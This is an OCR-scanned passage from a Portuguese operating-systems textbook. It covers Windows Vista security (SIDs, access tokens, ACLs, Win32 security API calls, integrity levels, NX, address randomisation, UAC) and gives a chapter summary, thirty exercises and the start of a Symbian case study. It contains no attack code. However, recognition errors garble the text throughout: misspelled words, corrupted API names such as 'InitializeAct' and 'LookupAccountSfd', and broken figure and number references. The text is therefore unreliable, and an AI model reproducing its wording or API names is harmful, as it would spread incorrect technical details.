empresas. Conseqiicntcmcntc r o Windows Vista oferc- 
ce ferramentas que podcm ser utilizadas por um usuario 
consdenic t^ara minimizar os danos quando um notebook 
e roubado ou pcrdido (por exemplo, autenticaęao segura, 
arquivos codificados etc,), & claro que os usuarios cons- 
ciemes sao agueles gue nao perdem o notebook — sao os 
outros gue causam probłemas. 

Na próxima seęao, descreveremos os conccitos basi- 
cos por tras da seguranęa do Windows Vista. Depois estu- 
daremos as cha ma das de sistema reladonadas com segu¬ 
ranęa, Por fint, conclinremos vendo como a seguranęa e 
implementada. 

11A11 Conceitos fundamentais 

Todo usuario (e grupo de usuarios) do Windows Vis- 
ta e idemificado por um SIO [security — identificador 
de seguranęa). Os SIDs sao numeros binarios com um 
peąueno cabeęalho seguido por um componente longo e 
aleatório. A imenęao e qtie cada SID seja ilnico em todo 
o mundo. Quando um usuario inicializa um processo, o 
processo e sens threads executam sob o SiD do usuario. A 
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maior parte do sistema de seguranęa destina-se a assegurar 
que cada objęto possa ser acessado somente pelos threads 
córa SIDs antorizados. 

Gada processo tern urna ficha de acesso que especi¬ 
fica urn $10 e om ras propriedades, Essa licha e normal¬ 
nienie atribinda no niomemo de acesso ao sistema, pelo 
wintogon, conforme descrito a seguir. O formato da ficha 
e niostrado na Figura 11.29. Os processos devem chamar 
GetTokenlnformation para obter essa informaęao. O cabeęalho 
contem algumas informaęoes administrativas. O campo de 
yalidadc pode indicar quando a ficha deixa de ser valh1a, 
mas atualmente cle nao csta sendo utilizado. Os carapos 
Groups espedficam os gmpos aos quais o processo pcrtcncc; 
isso ć nccessario para haver conformidadc coirt o P0$IX, 0 
DACL {dhcretionaiy ACL — lista de controle de acesso 
discricioiiario) c a lista de co mrok de acesso airibufda 
aos objetos criados pelo processo se nentuim ouiro ACL 
foi especificado. O SID do usuario indica quem possui o 
processo. Os SIDs resiritos sao para pemiilir que processos 
nao confiaveis partidpem de trabalhos, com os processos 
confiaveis, mas com menos poder de causar danos. 

Por firn, os privilegios relacionados, se houver, dao 
ao processo poderes esperiais, como o dirclto de desligar 
a maąuina on de acessar arquivos para os quais o acesso 
seria negado a outros processos, Com isso, os privilegios 
diyidem o poder do supemsuario em vartos direiios que 
podem ser atribiudos individualmente aos processos. Assim, 
um u su ario pode ter algum poder de superusuario, mas nao 
todo o poder. Resumindo, a ficha de acesso indica quem 
possui o processo e quais eonfiguraęoes-padrao e poderes 
sao assodados a ele, 

Quando um usuario acessa o sistema, o winhgon fome- 
ce um loken ao processo micial. Os processos subseąuerues 
normaInieme herdam esse loken e prosseguem. Um loken 
de acesso do processo se aplica, imdaimente, a todos os 
threads do processo, Contudo, um thread pode obter, du- 
rante a execuęao, outro token — nesse caso, o token de 
acesso do thread sobrepoe a ficha de acesso do processo. 
Paniculaimente, um thread diente pode passarseu token 
dc acesso a um thread scrvidor, para que o servidor pos¬ 
sa ter acesso aos arquivos protegidos e a outros objetos do 
cliente. Esse mecanismo e chamado de personificaęao 
e e implementado pelas camadas de transporte (ou seja, 
ALPC, uibos norneados eTCP/lP). Ele e utilizado pela RPC 
para coniunicaęao entre cliemes e servidores. Os transpor- 
tes utilizam interfaces internas no componente monitor de 
referencias de seguranęa do ntkleo para exirair o contexto 
de seguranęa para o token de acesso do thread corrente e 
enviam para o lado servidor, on de e utilizado na constru- 
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ęao de u ma ficha que pode ser tttilizada pelo servidor para 
personalizar o cliente. 

Outro conceito basico e o descritor de seguranęa, 
Todo objęto tern um descritor de seguranęa assoriado que 
indica quem pode opera-lo e de que modo. Os descrito- 
res de seguranęa sao especifkados quando os objetos sao 
criados. O sistema de arquivos NTFS e o registro mantem 
urna forma persistente de descritor de seguranęa utilizado 
para criar o descritor de seguranęa para os objetos Arquivo 
e Chave (o gerendador de objetos se recusa a representar 
instandas abertas de arquivos e chaves). 

Um descritor de seguranęa e formado por um cabeęa- 
Iho, seguido por um DACL com um ou mais ACEs {mess 
contro! ekments — elementos de controle de acesso). Os 
dois prindpais tipos de elementos sao: Permissao e Nega- 
ęao. Um element o de permissao especi fi ca um S1D e um 
mapa de bits quc detemiina quais operaęoes os processos 
com aąuele SID podem rcaiizar com o objęto. Um elemento 
de negaęao funriona do rnesmo modo, só que, nesse caso, 
qttem chama nao pode realizar a opera ęao. Por exeinplo, 
Ana tern um arquivo cujo descritor de seguranęa especifica 
que todos tern acesso a leitura e que Elvis nao tern acesso, 
Calarina tem acesso para leitura e eserita e a própria Ana 
tern. acesso toiai. Esse cxemp)o simples e ilustrado na Pi- 
gura .1130, O SID Todos rdere-se ao conjunto de todos os 
usuarios, mas dc e sobreposto por quaisquer ACEs explici- 
tos quc vierem em seguida. 

Aletn do DACL, um descritor de seguranęa lambem 
tern um S ACL {system ACL — lista de controle de acesso 
ao sistema), parecido com um DACL, só que especifica 
ąuais operaęoes sobre o objęto sao gravadas no registro de 
cvcnros de seguranęa, c nao ąiiem pode usar o objęto. Na 
Figura 1130, toda operaęao que Marilia fizer sobre o ar- 
quivo sera regisirada. O SACL lambem contem um nfvel 
de integridade, que descreveremos a seguir. 

11.9.21 Chamadas API de seguranęa 

A maloria (los mccanismos de controle de acesso do 
Windows Vlsta e baseada em descrit o res de seguranęa. O 
pa dra o usual e que, quando um processo cna um objęto, 
ele fornccc um descritor dc seguranęa como um dos para¬ 
ni et ras para CreateProcess, CreałeFile o u para outra cha ma¬ 
da de criaęao de um objęto. Esse descritor dc seguranęa 
lorna-se, entao, o descritor de seguranęa associado ao ob¬ 
jęło, como vemos na Figura 1130. Se nenhum descritor de 
seguranęa for forneddo na cha mada de criaęao do objęto, 
sera usada a eon figu raęao-padrao de seguranęa da ficha de 
acesso de qnem fez a chamada (veja a Figura 11.29). 
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I Figura 11.29 Estrutura de urna licha de acesso. 
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Descritor de 


seguranęa 



> ACE 


>ACE 


I Figura 11.30 Um exemplo de descritor de seguranęa para um arquivo. 


Mtiiias da s cha mada s de seguranęa da APT Win32 re- 
ladonam-se com o gcrcnciamcnto dos descritores de segu¬ 
ranęa; portanta iremos nos concemrar nessas chamadas. 
As chama das mais imporlantcs sao apresentadas na Tabe¬ 
la 11.19. Para criar um descritor de seguranęa, primdro 
deve ser alocada sua memória e enlao inidaiiża-la usando 
o Initialize-SecurityDescriptor. Essa cha ma da preenche o cabe- 
ęalho. Sc o SID do dono nao for conhecido, de podera ser 
buscado peio no me usando LookupAccountSfd. Ele pode a i li¬ 
da ser inserido no descritor de seguranęa. O mesmo vale 
para o SID do grupo, se houver. Normalnienie, esses SlDs 
sao os mesmos SiDs do dono e dos grupos do dono que fez 
a cha mada, mas o administrador do sistema pode preen- 
cher em qualquer SID. 

Nesse ponto, a DACL (ou SACL) do descritor de se¬ 
guranęa pode ser inidalizada com InitializeAct. As entradas 
da ACL podem ser adirionadas pela AddAccessAIlowedAce 
c AddAccessDeniedAce. Essas chamadas podem ser repeti- 


das varias vezes para adicionar tantos ACEs quantos forem 
neccssarios. DeleteAce pode ser usado para rcmovcr u ma 
entrada, isto c, mais adcąuada o u ma ACL cxistcntc do que 
a urna ACL que esteja sendo construfda pela primeira vcz + 
Quando a ACL cstiver pro n ta, a SetSecurityDescriptorDacI po¬ 
dera ser usada para junta-la ao descritor de seguranęa, Por 
Em, ąuando o objęto e criado, o descritor de seguranęa que 
acabou de ser criado pode ser passa do como um parametro 
para que faęa parte do objęto. 

11 >9.31 Implementacjo de seguranęa 

A seguranęa cm um sistema Windows Yista isolado 
e implementada por varios componentes, a maioria dos 
quais ja vimos (a rede e u ma omra historia totalmcnic di- 
ferente c esta alein do escopo deste livro). O accsso ao sis¬ 
tema e tratado peio winlogon e a auiemicaęao, pclos hetss. 
O resullado de um accsso bem-suceduło e urna nova GUI 


Fungao APl do Win32 

Doscrięao 

1 n ittal izeSec u r ity Descrtptor 

Prepara um novo descritor de seguranęa para ser usado 

LookupAccountSid 

Busca o SID para um dado nonrte de usuario 

SetSecurityDescriplorOwner 

Entra com o SID do dono no descritor de seguranęa 

SetSecur ity Desc riptorG roup 

Entra com o SID do grupo no descritor de seguranęa 

InitializeAcI 

Inicializa urna DACL ou urna SACL 

AddAccessAilowedAce 

Adiciona um novo ACE a uma DACL ou SACL permitindo o acesso 

AddAccessDeniedAce 

Adiciona um novo ACE a uma DACL ou SACL negando o acesso 

DeleteAce 

Remove um ACE de uma DACL ou SACL 

SetSecuri tyDesc rip torDacI 

Anexa uma DACL a um descritor de seguranęa 


I Ta beta 11.19 As principais funęóes da APl do Win32 para seguranęa. 
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(shell explorer.exe) com sua licha de acesso associada, Esse 
processo usa as colmdas SECURITY e SAM do registro, A 
primeira ajusla a poKticagcral deseguranęa e a ultima cen¬ 
tem a informaęao de seguranęa para usuarios mdividuais, 
conforme dlscutido na Seęao 11.2.3. 

Urna vez qtie um usuario tenha emrado no sistema, 
ocorrem as operaęoes de seguranęa na abertura de urn ob¬ 
jęto a firn de quc de possa ser acessado. loda cha mada 
OpenXXX reąuer o nonie do objęto que esta sernlo aberto 
e o conjunto de direitos necessarios. Durante o processa- 
mento da abertura do objęto, o gerendador de seguranęa 
(veja a Figura 11*4) vcrifica se quem chamou tern todos 
os direitos exigidos. Bk faz cssa verificaęao examinando a 
ficha de acesso de quem chamou e a DACL assoriada ao 
objęto. Ele pereorre, na orderu, a lista de entradas na ACL. 
Logo que encontra urna entrada com o SID ignal ao SID 
do chamador ou de sen grupo, o acesso encorurado la e 
adotado como definitivo. Se todos os direitos necessarios 
a o chamador cstivcrcm dispomveis, a abertura sera bem- 
-sucedida; caso eontrado, da falhara* 

As DACLs podem ter entradas de Negaęao o u de Fer- 
missao, como ja vimos + Por Isso, e usual colo car as entradas 
de negaęao de acesso a frente das entradas de permissao de 
acesso na ACL, para que um usuario com um acesso esped* 
ficamcntc negado nao entre pcla porta dos fundos por ser 
um membro de urn grupo quc te o ha acesso permitido. 

Depois que um objęto foi aberto, e retornado um ma¬ 
il iputador para o chamador, Nas chamadas subscquenies, 
a tinica verificaęao reatizada e se a operaęao que esta sen- 
do tentada estava no conjunto de operaęoes reąuisitadas 
no momento da abertura, Isso vi$a impedir o processo que 
chamou de abrir um arquivo para lei tura c, depois, tentar 
escrever nele. Alem disso, as chamadas nos manipuladores 
podem resultar eni entradas no registro de auditoria, eon- 
formę solid tado pdo SACL. 

O Windows Visla inclutu outro rccurso de seguranęa 
para lidar com próbie mas comtms de seguranęa do sistema 
ulilizando ACLs, Existem novos SIDs de mVel de inre- 
gridade na ficha de acesso e objetos espedficam um mvel 
de integridade ACE no SACL. O nivel de integridade inibe 
operaęoes de escrila no objęto, indcpcndcnicmente do ACE 
que esteja no DACL. Em particnlar, o esąuema de mvel de 
integridade e utilizado para proteger contra um processo 
do Internet Esplorcr que tenha sido comprometido por um 
a ta ca me (talvez o usuario desavisado baixando código de 
nm Website). O \E com direitos baixos, como e charnado, 
fundona com um irivd de integridade definido como bako. 
Por padrao, todos os arquivos c chavcs do registro no siste- 
ma possuem ntvel de integridade medio> e o IE funcionando 
com nfvd de integridade baixo nao pode modifka-los, 

Diva;sos outros recursos de seguranęa foram adiriona- 
dos ao Windows nos ultimos a nos. No Service Pack 2 do 
Windows XF f a major parte do sistema foi compilada com 
a opęao (/GS) que fazia a vatidaęao contra varios tipos de 
transbordameruo da pilha do bu der. Alem disso, um recur- 
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so da arqmtetura AMD64, denominado NX, foi utilizado 
para limitar a execuęao de código nas pilhas. O bit NX no 
processador esta disponwcl mesmo ąuando em cxccuęao 
no modo xS6. NX significa noexcaue (nao exccuie) e per- 
mi te que pa gin as sejarn marca das de modo quc nenhum 
código possa ser executado a partir delas. Assim sendo, se 
um atacantc utiliza uma vulncrabilidadc de t ran sb orda- 
men to de buffer para inserir código em um processo, nao e 
tao facil saltar para o código e comeęar a executa-lo. 

O Windows Vista introduziu ainda mais recursos de se¬ 
guranęa para dificultar o trabalbo dos atacantes. O código 
carregado no modo mielec e verificado (por padrao nos 
sistemas x64) e carregado somente se devidamente sinali- 
zado. Os endereęos nos quais DLLs e EXEs sao carregados, 
bem como as alocaęocs das pilhas, estao um pouco mis¬ 
iu rados em ca da sistema para tor nar rnenos provavel que 
um atacantc consiga usar com succsso o transbordamento 
dc buffer para acessar um endereęo conhccido c comeęar 
a executar segucncias dc código que podem levar a um 
aumento de privilegio. Uma fraęao bem me nor de sistemas 
csla apta a ser atacada por confiar em binarios armazetia- 
dos cm endereęos-pa dra o* E muito mais provavd que os 
sistemas simplesmente iravem, convenendo um ataque 
potencial em outro menos perigoso de recusa de sendęo. 

Outra modificaęao foi a inclusao do que a Microsoft 
chama de U AC (wscr accaunt contro! — controle de conta 
do usuario g para trata r o próbie ma cronico no Windows 
cm que muitos usuarios se conectain como administrado- 
rcs. O projeto do Windows nao faz cssa cxigencia, mas a 
ncgligencia ao lorigo de varias ver$6es t orno u quase que 
impossfvel a ntilizaęao bem-sucedida do Windows sern per- 
fil de administrador. Em retem o, ser administrador o tempo 
todo c algo perigoso nao somente porque os erros do usuario 
podem dauificar o sistema, mas larnbem porquc, se o usua¬ 
rio for enganado ou atacado e executar código quc este¬ 
ja tentando comprometer o sistema, o código tera acesso 
a d mini st rat i vo e pode enterrar-se bem fundo no sistema. 

Com o U AC, se ocorre uma tema li va de execuęao de 
uma operaęao que demanda pennissoes dc adminislrador, 
o sistema cria um desktop especiai c assume o controtc 
para que somente entradas do usuario possani autorizar o 
acesso (semelhante a forma como CTRL-ALT-DEL fundona 
para a seguranęa do C2). Ć claro que um atacante consegue 
destmir os dados importantes para o usuario, ou seja, os 
arquivos partie u) a rcs, mesmo sern se tornar admimstrador, 
Entretanto, o U AC realnienie aj uda a impedir certos tipos 
de ataque, e e sempre mais facil recuperar u m sistema com- 
prometido sc o atacantc nao conseguiu modificar os dados 
do sistema ou os arquivos T 

O ultimo recurso de seguranęa no Windows Yisla ja 
foi mendonado por nos. Exi$ic suporte para a criaęao de 
procosm pwtąjidos que criam uma barreira de seguranęa, 
Normalmente, o usuario (representado por um objęto fi¬ 
cha) define os limites de privilegios no sistema. Quando 
urn |>rocesso c criado, o usuario tem acesso para processar 
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qualquer ąuantidade de recursos do mielca para a criaęao 
de processos, depuraęao, nonies de caminhos de diretó- 
nos, injeęao de threads etc Os processos protegidos nao 
sao acessados pelo usuario. No Vista, a dni ca utilizaęao 
dcssc recurso ć permitir quc o software dc gerendamento 
dc dirciios digitais proteja niclhor o conteudo. O oso de 
processos protegidos com propósiios mais amigaveis f como 
proteger o sistema contra ataques em vez de proteger o 
conteudo contra ataąues do proprietario do sistema, talvez 
seja expandido nos finuros lanęamemos. 

Os esforęos da Microsoft para a urnę mar a scguranęa do 
Windows foram acclcrados nos uitimos a nos a mcdidn que 
cad a vcz mais ataąues foram disparados ao redoi do mun- 
do — aiguns rnuito bem-sucedidos, ddxando pafses imd- 
ros e grandes empresas off-line e gerando custos de bilhoes 
dc dólares. A major parte do$ ataąues exptora pcąuenos 
crros de código que levam ao transbordamento de buffec 
permitindo que o a taca nie insira códigos sobrescrevendo 
endereęos de retorno, ponteiros de exceęao e outros dados 
que conl rola rn a execuęao dos pr ogra mas* Mu U os desses 
problem as podcriam ser evitados se lirgttagcns seguras fos- 
sem utilizadas no lugar de C e C++. £ mesmo com essas lin- 
guagens pouco seguras, inuitas vulnerabilidades poderiam 
ser evitadas se os estudantes fosscm mais bem trcinados na 
comprecnsao dos pormenores dos parametros c da valida- 
ęao dos dados. A finał, muitos dos engenheiros dc software 
quc cscrevem código na Microsoft foram estudantes ha al- 
guns a nos, assim como muitos dc vocćs quc estao len do 
este estudo de caso. Exi$tem muitos livms dispomveis que 
falam sobie os pcąuenos crros de código exploravcis cm 
linguagens baseadas em ponteiros c como evita-Ios (por 
exemplo, Howard e Le Blank, 2007), 


11.10 


Resumo 


No Windows Visla, o modo nucleo esla estru tu rado 
na HAL nas camadas exccutiva e de nucleo do NTOS e 
urn grandę numero de drivers de dispositivos que rmple- 
mentam tudo, desde servięos de dispositwos e sistemas 
de arquivos a redes c gra fi cos, A HAL esconde de outros 
componemes certas dilerenęas de hardware, A camada 
do nucleo gcrencla as CPUs dc modo quc clas suportem 
multithrcading c sincronizaęao, c a camada exccutiva im- 
plcmcnta a maioria dos scrvięos do modo nucleo, 

O executivo baseia-se em objetos do modo mleko que 
representam as principais estruUtras de dados, incluindo 
processos, threads, seęoes da memória, drivers, dispositivos 
e sincronizaęao de objetos, entre outros. Os processos do 
usuario criam objetos por meto de cha mada s de servięos do sis- 
tema e devolvem referendas de descritores que podem ser 
utilizados nas chamadas de sistema subseąuentcs aos com- 
ponentes do exccutivo. O sistema opcracional tambem cria 
objetos internamenie. O gerenriador de objetos mantem 
urn espaęo de nonies no qual objetos podem ser inseridos 
para buscas fu tu ras, 


Os objetos mais imponantes no Windows sao proces¬ 
sos, threads e seęoes. Os processos possuem espaęos de en- 
dereęamento virtual c sao espaęos para recursos. Os threads 
sao a unidade de execuęao e sao escalonados pela camada 
do nucleo utilizando um algoritmo dc prioridadc no qual 
o thread pronto dc mais alta prioridadc sempre e executa- 
do, realizando a preempęao dos threads de prioridadc mais 
baixa eon formę nccessario. As seęoes representam objetos 
na memória, como arquivos, que podem ser tnapeados nos 
cspaęos de cndereęamcnto dos processos. lmagens dc pro- 
gra mas EXE e DLL sao representados como seędes, bem 
como a memória compartilliada. 

O Windows suporta memória virtual paginada sob de- 
manda, O algoritmo de paginaęao esia baseado no conceiio 
de conjunto de trabalho. Para otimizar o uso dc memória, 
o sistema mantem diversos tipos dc listas de paginas. Essas 
diferentes listas dc paginas sao alimentadas por mcio da 
redu ęn o dos conjuntos dc trabalho utilizando-se form u las 
complexas que temam reuiilizar paginas ffsicas que nao 
sao referendadas ha rnuito icmpo. O gerenciador dc ca- 
che administra os cndercęos vinuais no nucleo que podem 
ser utilizados ]iara mapear arquivos para a memória, me- 
ihorando drasticamente o desempenho da E/S para muiias 
aplicaęóes, ja que as operaęóes de leilura podem ser aten- 
didas sem acessos ao disco. 

As operaęoes dc E/S sao realizadas pelos drivers dc 
dispositivos, quc segucm o Modclo dc Drivcrs do Windows. 
Gada driver comeęa inidalizando urn objęto dc drivcr que 
contem os endereęos dos procedimentos qtie podem ser 
chamados pdo sisiema para manipular os dispositivos. Os 
dispositivos reais sao represemados pelos objetos dispositi- 
vos quc sao cria dos a pa rur da descrięao da configuraęao do 
sistema ou pdo gerenciador phuj-and-play ąuatido cle des- 
cobre dispositivos ao especiftcar os harramentos do sistema. 
Os dispositivos sao empilliados e os pacotes de solicitaęao 
dc E/S sao repassa dos as pilhas e atendidos pelos drivers de 
cada dispositivo na pilha de dispositivos> Operaęoes de E/S 
sao assmeronas por natureza, e os drivers norma!mente en- 
fileiram as solidtaęóes para processamento futuro e retor- 
no ao chamador. Os volmnes dos sistemas dc arquivos sao 
implemcntados como dispositivos no sistema dc E/S. 

O sistema de arquivos NTFS baseia-se em urna tabela 
mestre de arquivos, que possui um registru por arquivo ou 
diretório, Todos os meta dados em um sistema de arquivos 
NTFS tambem sao parte de um arqttivo NTFS. Cada arqui- 
vo possui multiplos atributos, que tamo podem estar no 
registro MFT ąuanto nao estarem residentes (armazenados 
cm blocos fora da MET), O NTFS suporta Unicode, com- 
pressao, uso dc di ario, codificaęao e outros recursos, 

For Jim, o Windows Visla possui um sistema de segu- 
ranęa sofisticado baseado nas listas de controle de acesso e 
nos nfveis de integridade. Cada processo possui urna ficha 
de autenticaęao que informa a identidade do usuario e qua!s 
prmlegios cspeciais o processo possui (se houver). Cada 
objęto possui um descritor de seguranęa a de assodado 
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que aponta para u ma lisia de acesso discricionaria que 
contem eniradas de acesso que podem permilir on negar 
acesso a indmduos ou grupos. O Windows inseriu diversos 
recursos de seguranęa nas ultimas distribuięoes, incluindo 
o BitLocker para eodificaęao de volumcs inteiros, randomi- 
zaęao dc cspaęos de cndcrcęamcnio, pilhas nao exccuta- 
ycis c outras mcdidas que ternam niais diffeds os ataques 
per transbordamente dc buf fen 

Problemas 

1. A HAL monitora o lempo a partir do ano 1601. De u ni 
exemplo de urna aplicaęao para essa caractensiica. 

2 . Na Seęao 1 L3.2, dcscreyemos os problemas causados por 
aplicaęoes multithreading encerrando os manipuladores 
cm um tbread cnquanio a ind a os util i za ni cm ouiro, Urna 
possibilidade para corrigir esse prób lenia seria mscrir um 
ca nipo seąuencia. Como isso poderia aj udar? Que nm- 
danęas no sistema seriam necessarias? 

3. O Win32 nao tem sinais. Se fossem iniroduzidos, eles po- 
deriam existirpor processo, por tbread, porambos ou por 
nenhtim deles. Faęa urna proposta e explique porque isso 
seria u ma boa ideia. 

4. Urna altemativa ao uso dc DLLs ć ligar cstaticamente cada 
programa com, predsamente, os proccdimcntos dc biblio- 
teca que ele realnienie chama, nem mais nem menos. Se 
fosse imroduzido, esse esqnenia leria niais semido ern 
maquinas clientes ou em maqumas semdoras? 

5. Quals sao algumas das razoes para um tbread possuir 
pilhas separadas para o modo nudeo c o modo usuario 
no Windows? 

6 . O Windows uiiliza paginas de 4 jMB porąue isso aumcma 
a efidenda da TL 8, o qne pode causar um impacto pro- 
fundo no deseni pen ho. Por que isso ocorre? 

7. Ha algom limite para o n u mero de operaęóes diferentes 
que podem ser definidas sobre urn objęto executivó? Em 
caso aflrmaiivo, de ondc vcm esse limite? Em caso nega- 
livo, por que? 

8 . A ch a ma da da A PI Wio 32 WaftForMultipieObjeots permite 
que um tbread seja bloąueado dlantc dc um conjunto dc 
objetos de sincronizaęao cujos rtianipuladores sao passa- 
dos como parameiros. Assim que algum deles e sinali- 
zado, o tbread que esta chamando e liberado. £ posstve! 
ter o conjunto dc objetos de sincronizaęao, entre eles 
dois sc ma for os, um mutex e urna seęao crftica? Porque? 
Dica: esta q u esta o na o e urna 'pegadinha', mas reąuer 
algum cuidado. 

9. Cite tres razoes para que um processo possa ser finalizado. 
10, Confornie descrito na Seęao 11.4, exisie urna tabela de 

descritores esperial uiilizada para alocar IDs de proces- 
sos e ibreads, Os algorimios para as tabelas de descritores 
normalmentc alocam o primciro dcscritor livrc fmanten- 
do a lista de !ivres na ordem LlFO}. Nos lanęainentos re- 
centes do Windows, isso foi modificado de forma que a 
tabela de IDs sempre mamenha a lisia de livres na ordem 
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FIFO. Qual o próbiema quea ordem UFO polencialmeme 
causa na alocaęao de TDs de processos, e por que o .0X 
nao tem esse problema? 

11. Suponha quc o ąuamum seja config u rado como 20 ms 
e o thread atual, na prioridade 24, tenha acabado de ini- 
cializar um quamum. De repente, uma operaęao de E/S 
termina cum tbread de prioridade 2S fica pronto. Quanto 
tempo ele deve esperar para conseguir executar na CPU? 

12. No Windows Vista, a prioridade atual e sempre maior ou 
igual a priori dade-basc. Ha algum a dramstanda na qual 
faria sentido tera prioridade atual rnais baixa quc a priori- 
dade-base? Em caso a firma li vo, de um exemplo. Em caso 
negativo, por que nao? 

13. No Windows, foi facil implementar recursos nos quaisos 
threads funcionando no niicleo pudessem temporaria- 
mente se conectar aos espaęos de endereęamento de um 
processo diferentc\ Por quc isso ć muito mais difkll dc 
implementar no modo usuario? Por que pode ser interes- 
sanie faze-lo? 

14. Mesmo ąuando cxiste meniória livrc suficicntc, c o gc- 
renciador de inemória nao precisa d i mi nu i r os conjuntos 
de irabaiho, o sistema de paginaęao ainda pode estares- 
crevendo no disco com frequencia, Porque? 

15. Por que o automapeamento utilizado para acessaras pa¬ 
ginas fisie as do diretório c da tabela dc paginas dc um 
processo sempre ocupa os mesmos 4 MB dóś endereęos 
vimiais do nudeo (no xSó)? 

16. Se uma regiao do cspaęo dc endcreęamemo virtual cs- 
tiver resemada, mas nao compnurtclida, sera criado um 
VAD para essa regiao? Justifique sua resposia. 

17. Qual das transięoes mostradas na Figura 11.20 sao deci- 
sbes poffticas, em oposięao aos movimentos necessarios e 
foręados pelos evenios do sistema (por exemplo r um pro¬ 
cesso que esteja saindo e liberamio suas paginas)? 

18. Suponha que uma pagina seja compartilhada — e por 
dois conjuntos dc traba 1 ho ao mesmo tempo, Sc for des- 
pcjada dc um dos conjuntos de trabaUio, para ondc da 
ira, na Figura 11.20? O que acontece quando e despejada 
do s eg u ndo conjunto de i ra bal ho? 

19. Quando um processo desmapeia uma pil ha de paginas 
lim pa, ele faz a transięao (5) da Figura 11.20. Para onde 
vai uma pi Ilia dc paginas sujas ą u and o desmapcada? Por 
que nao ha transięao para a lisia de modifkadas quando 
uma pagina su ja e desmapcada? 

28. Imagine quc um objęto despachante representando al- 
gum tipó de bloqudo exdusi to (como um mutex) esta 
marca dc para utilizar um evento de notificaęao em vez 
de um de sincronizaęao para anunciar que o bloqueio foi 
liberado. Por qtte isso seria ruim? O quanto a resposia de- 
penderia do tempo de espera do bloqueio ; do tamanho do 
quanuim e do fato de o sistema ser um multiprocessador? 

21. Um arquivo tem o seguinie mapeamemo. De as serics de 
entradas da MFT. 

Deslo ca men to 0 12 345 6 78910 
Endereęo de disco 50 51 52 22 24 25 26 53 54 ~ 60 
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22 , Considerc o registru da MFT da Figura 1L25, Suponha 
que o arquivo crescesse e um dócimo bloco fosse atribui- 
do ao fi ni do arquivo. O nu mero desse bloco e 66. Com o 
que o registro da MFTse parecerla agora? 

23, Na Figura ll.2£(b), as duas primdras series sao de oko 
blocos cada. O falo de clas serem iguais e apenas um aci- 
denie o u isso tein relaęao com o modo de fundonamento 
da compressao? Ju$iifique sua resposta. 

24, Suponha que voce queira constmir um Windows Yisia 
Ute. Ouais dos campos da Figura 11.29 poderiam ser re- 
mcwidos scin cnfragueccr a seguranęa do sisiema? 

25, Um modelo de extcnsao utilizado por rnuitos programas 
(navegadores da Web, Office, servidores COM) envolve 
a hespedagetn de DLLs para criar ganchos e esiender sua 
hineionalidadc subjacente, Este e tim modelo razoavd 
para ser tui li za do em um servtęo bas ca do em RFC se ele 
tiver cuidado de personalizar os dientes anles de carregar 
a DLL? Por quc nao? 

26,. Quando em execuęao em uma maquina NUMA, sempre 
quc o gore net ad ordę nicniória do Windows precisa alocar 
unia pagi.ua lisica para ttatar unia faita de pagina, ele len¬ 
ta utillzar uma pagina do nó NUMA para o proeessador 
ideał do tliread correme. Por quc? E se o thread estiver 
sendo executado em um proeessador diferente? 


27. De alguns exemplos nos quais uma aplicaęao conseguiria 
se recuperar fanlmeme a parlir de uma cópia de seguran¬ 
ęa com base em utną cópia sombra de volume em vez de 
parlir do estado do disco após uma parada, 

2&. Na Scęao 11.9, a oferta de mais menióda para o monte do 
processo foi ciiada como um dos cenarios que requerem o 
fomerimemo de paginas zero da s para que os requisitos de 
seguranęa sejam salisfekos. De um ou dois exemplos de ope¬ 
ra ędes da memória vi rtual que precisa ni de paginas zeradas. 

29. O co ma udo regedit pode ser u sad o para exportar uma par¬ 
te ou a totalidadc dos registros para um arquivo-texto, 
em todas as versdes atuais do Windows. Salve o regis- 
tro varias vezes durame uma sessao de trabalho e ve]a o 
que muda. Se voce tiver acesso a um compulador com 
Windows e no qual voce possa instalar software ou har¬ 
dware, deseubra quab nurdanęas ocorrcm quando um 
program a o u um dispositivo e adicionado ou removido. 

30, Escreva um próg rama. UNIX que sitnule a escrita de um 
arquivo NTFS com varios fluxos. Ele devc accitar uma 
lista de um ou niais arquivos como pa ranie truś e ostre- 
ver um arquivo de saida que contenha urn fluxo com os 
atdbulos dos parametros e outros fluxos com o comeudo 
de cada urn dos parametros. Agora, escreva um segundo 
programa para relatar sobre os atributos e os fluxos e ex- 
iraia mdos os componentes. 
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Estudo de caso 3: 
sistema operacional Symbian 


Nos dois capftutas anteriores, examinamos dois sislc- 
mas operacionais populares para desktop e notebooks: o 
Linux e o Windows Vista, Entretanto, mais de 90 por cento 
das CPUs no mumio nao esiao nos PCs desktop e note- 
books, mas nos sistemas embarcados, como os telefon es 
celulares, PD As, cameras digitais, himadoras, maąuinas de 
jog os, iPods, tocadores de MP3, tocadores de CD, grava- 
dores de DVD, roteadores sem bo, aparelhos televisores, 
receptores GPS, impressoras a laser, carros e muitos outros 
produtos de consumo. Muitos ddes usam chips inoder- 
nos dc 32 c 64 bits, c quasc todos cxcciitam urn sistema 
operacional maduro. No c nianio, poucas pcssoas sabem 
da ćxi$tenda desses sistcmas operacionais, Neslc capftulo, 
apresentaremos urna visao mais detalhada de um sistema 
operacional popular no mumio dos sistcmas embarcacios: o 
sistema operacional Symbian. 

O Symbian e o sistema operacional executado nas pla- 
taformas móveis dos smartphones {telcfoncs imcEigcmcs) dc 
varios fabricames diferentes, Os smartphones sao chamados 
assim porque execulam sistemas operadonais com funęóes 
completas e apresentam caracteristicas de PCs desktop, O 
sistema operacional Symbian e projetado de forma a ser a 
base para uma variedade exiensa de smartphones de varios 
fabricantes. Ele foi cuidadosamente projetado para funcio- 
nar especificamente em plataformas de smartphones: com¬ 
putadores de uso geral com CPU, memória e capaddade de 
armazenamento limitados, focados em comunicaęao. 

Nossa discussao sobre o sistema operacional Symbian 
comeęara com sua historia. A presem a rei nos uma visao 
geral do sistema para dar uma ideia de como ele foi pro¬ 
jetado e quais aplicaęoes sens projetistas pręt en di ani que 
ele tivesse. A segiur, iremos examinar os varios aspectos 
do pro je to do sistema operacional Symbian como bzemos 
com o Limix c o Windows: vcremos proccssos, gereneia- 
mento de memória, H/S, sistema de arquivos e seguranęa. 
Concluiremos com uma vi$ao de como o Symbian aborda a 
comunicaęao nos tclcfones inteligentes. 


12.1 


A historia do sistema 
operacional Symbian 


O UNIX tem uma longa historia; quasc ancestral cm 
termos de computadores* O Windows tem uma historia 


mais ou menos longa. O Symbian, ao conlrario, tem uma 
historia bem arna. Ele tem raizes em sistemas desenvol- 
vidos nos a nos 1990 e seu aparecimento se deu em 200 L 
Isso nao dcvcria ser surpresa, uma vcz que as piatalormas 
dos smartphones nas quais o Symbian fundona tambem 
evolutram apenas receutemente. 

O sistema operacional Symbian tem suas rafzes em dis- 
